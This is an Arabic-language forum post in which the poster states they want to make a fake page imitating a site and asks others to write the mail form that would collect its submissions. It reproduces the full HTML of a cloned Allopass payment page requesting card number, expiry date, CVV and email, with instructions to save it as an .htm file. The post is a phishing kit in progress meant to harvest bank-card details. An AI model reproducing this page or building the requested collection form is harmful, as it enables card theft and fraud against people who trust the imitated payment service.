السلام عليكم
إخوانا أنا أردت صنع صفحة مزورة لأحد المواقع لكن المشكل في الفورم البريدي لا أعرف صنعه ولا دمجه مع الصفحة وقررت رفع تلك الصفحة للمنتدى وأطلب من أحد الإخة صنع فورم بريدي لتلك الصفحة وسأقوم أنا برفعه في موقع ولكي لا أطيل عليكم ها هو كود أش تي إم للصفحة


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>

<title>Achat de vos codes d'accès | Allopass.com</title>

<meta http-*****="Content-Script-Type" content="text/**********" />
<meta http-*****="Content-Style-Type" content="text/css" />
<meta http-*****="Content-********" content="fr" />
<meta http-*****="Content-Type" content="text/html; charset=utf-8" />
<meta http-*****="pics-label" content="(pics-1.1 'http://www.icra.org/ratingsv02.html' l gen false for 'http://www.allopass.com' r (nz 1 vz 1 lz 1 oz 1 cz 1))" />

<meta name="category" content="Business,Financial Services,Merchant Services,Other Payment Systems,Micropayments" />
<meta name="keywords" content="Allopass, micropaiement, audiotel, securisé, carte bancaire, code, ticket, accès, téléphone, surtaxé, sms, audiotex, rentabiliser, régie, publicité, accès payant, micro, paiement, webmaster, argent, gain, affiliation, marque blanche, parrainage, parrain, filleul, bannière, pub" />
<meta name="description" content="La solution de micro paiement sécurisée Allopass est leader sur le marché européen. Allopass est une plateforme de micro paiement par téléphone, sms et carte bancaire facile à installer et qui vous permet de rentabiliser rapidement votre site : codes accès, affiliation, parrainage, sponsoring, publicité ..." />

<meta name="revisit-after" content="15 days" />
<meta name="robots" content="index,follow" />

******** type="text/**********" src="/ecma/ext/prototype.js">***********
******** type="text/**********" src="/ecma/main.js">***********

<link rel="shortcut icon" type="image/x-icon" href="https://payment.allopass.com/images/common/favicon.ico" />

<link rel="stylesheet" type="text/css" media="all" href="https://payment.allopass.com/css/screen.css" />

</head>
<body>


<div id="page">

<div id="page-header">

<h1 id="header-title"><a href="/"><span>Allopass.com</span></a></h1>

<div id="header-secure">
<img src="/images/icons/lock.png" alt="" />
<strong>Vous êtes sur une page sécurisée</strong><br />
<span>Serveur de paiement sécurisé SSL 128 bits</span>
</div>

</div>

<div id="page-********">
<form method="get" action="/acte/creditcard/purchase.apu">
<fieldset>
<input type="hidden" name="ids" value="109915" />
<input type="hidden" name="idd" value="448422" />
<img src="/images/flags/mini/fr.gif" alt="FR" />&nbsp;
<select class="comboBox" name="lang" onchange="this.form.submit()">
<option value="">- Select your ******** -</option>
<option value="en">In english</option>
<option value="es">En espa&ntilde;ol</option>
<option value="fr">En français</option>
<option value="it">In italiano</option>
<option value="pl">Po polsku</option>
</select>
</fieldset>
</form>

</div>

<div id="page-content">

<h1>Achat de vos codes d'accès</h1>

<p><strong>Seul Allopass aura connaissance de vos informations bancaires.</strong><br />
En aucun cas ces informations ne seront transmises au site auquel vous souhaitez accéder, celles-ci restent donc totalement confidentielles.<br />
Le nom du site auquel vous souscrivez n'apparaitra pas sur votre relevé bancaire.</p>

<form class="formLayout popupForm" id="paymentForm" method="post" action="purchase.apu">
<div class="formPrologue"><input type="hidden" name="formName" value="form1" /><p>Les champs marqués d'un astérisque <span class="requiredField">*</span> sont obligatoires.</p></div>
<fieldset>
<input type="hidden" name="step" value="creditCardInformation" />
<input type="hidden" name="ids" value="109915" />
<input type="hidden" name="idd" value="448422" />
<input type="hidden" name="lang" value="fr" />


<p class="input">
<span class="label"><span class="requiredField">*</span> <label for="numberOfCodes">Nombre de codes désirés</label>:</span>
<span class="field"><select class="comboBox" id="numberOfCodes" name="numberOfCodes"><option value="1">1 code pour 1.00 EUR</option><option value="2">2 codes pour 2.00 EUR</option><option value="3">3 codes pour 3.00 EUR</option><option value="4">4 codes pour 4.00 EUR</option><option value="5">5 codes pour 5.00 EUR</option></select></span></p>

<p class="note">Un seul débit sera effectué.</p>
<span class="clearer">&nbsp;</span>
</fieldset>

<fieldset>
<legend>Votre carte bancaire</legend>
<span class="clearer">&nbsp;</span>

<p class="input">
<span class="label"><span class="requiredField">*</span> <label>Type de carte</label>:</span>
<span class="field">
<label class="creditcard-option"><input class="radioButton" id="creditCardType_2" name="creditCardType" type="radio" value="2" checked="checked" /> <span class="credit-card-type" id="visa">VISA</span></label>
<label class="creditcard-option"><input class="radioButton" id="creditCardType_3" name="creditCardType" type="radio" value="3" /> <span class="credit-card-type" id="master-card">MasterCard</span></label>
<label class="creditcard-option"><input class="radioButton" id="creditCardType_1" name="creditCardType" type="radio" value="1" /> <span class="credit-card-type" id="carte-bleue">Carte de débit</span></label>
<span class="clearer">&nbsp;</span>
</span>
</p>

<p class="input">
<span class="label"><span class="requiredField">*</span> <label for="creditCardNumber">Numéro de carte bancaire</label>:</span>
<span class="field"><input class="textField" id="creditCardNumber" name="creditCardNumber" type="text" size="30" maxlength="40" autocomplete="off" value="" /></span></p>

<p class="input">
<span class="label"><span class="requiredField">*</span> <label for="creditCardExpireMonth">Date d'expiration</label>:</span>
<span class="field"><select class="comboBox" id="creditCardExpireMonth" name="creditCardExpireMonth"><option value="01">01</option><option value="02">02</option><option value="03">03</option><option value="04" selected="selected">04</option><option value="05">05</option><option value="06">06</option><option value="07">07</option><option value="08">08</option><option value="09">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option></select>&nbsp;<select class="comboBox" id="creditCardExpireYear" name="creditCardExpireYear"><option value="2010" selected="selected">2010</option><option value="2011">2011</option><option value="2012">2012</option><option value="2013">2013</option><option value="2014">2014</option><option value="2015">2015</option><option value="2016">2016</option><option value="2017">2017</option><option value="2018">2018</option><option value="2019">2019</option><option value="2020">2020</option><option value="2021">2021</option><option value="2022">2022</option></select>&nbsp;</span></p>

<p class="input">
<span class="label"><span class="requiredField">*</span> <label for="creditCardCVV">Code CVV</label>:</span>
<span class="field"><input class="textField" id="creditCardCVV" name="creditCardCVV" type="text" size="4" maxlength="4" autocomplete="off" value="" /></span></p>

<p class="note">Ce code est composé des 3 derniers chiffres du numéro présent au dos de la plupart des cartes bancaires.</p>
<span class="clearer">&nbsp;</span>
</fieldset>

<fieldset>
<p class="input">
<span class="label"><span class="requiredField">*</span> <label for="netsurferEmail">Votre adresse email </label>:</span>
<span class="field">
<a class="helper" href="#" onclick="return false">
<input class="textField" id="netsurferEmail" name="netsurferEmail" type="text" size="30" maxlength="100" value="" />
<span class="helperLayer">
<strong>Important!</strong><br />
si vous utilisez une adresse email de type @aol.com ou @hotmail.com, il est possible que vous ne receviez pas votre confirmation d'achat. Leur politique d'anti-spam bloque nos emails.<br />
Nous vous invitons donc à vérifier la configuration de votre boite mail ou à utiliser un autre fournisseur de compte mail.
</span>
</a>
</span>
</p>
<p class="sample">Votre reçu de transaction et votre(vos) code(s) ont été envoyés à cette adresse.</p>
<span class="clearer">&nbsp;</span>
</fieldset>

<div class="formSubmit"><input class="button" name="proceed" type="submit" value="Suivant &raquo;" title="Suivant" /></div>
<div class="formEpilogue">&nbsp;</div></form>

<p style="text-align: center">Sur la page suivante, vous serez invité à confirmer votre achat.</p></div>

<div id="page-footer">
<p>
Copyright &copy;2001-2010 Allopass - Tous droits réservés </p>
<p class="notice">ATTENTION : nous recueillons des données personnelles sur ce site.<br />
Pour en savoir plus sur l'utilisation de ces informations, veuillez consulter notre page sur les <a href="/terms_sale.apu?lang=fr#privacy" onclick="return selfOpenWindow(this,900,700)">données personnelles</a>.</p> </div>
قم بنسخ الكود ووضعه في ملف txt لتحصل على صفحة htm

وشكرا إميلي [email protected]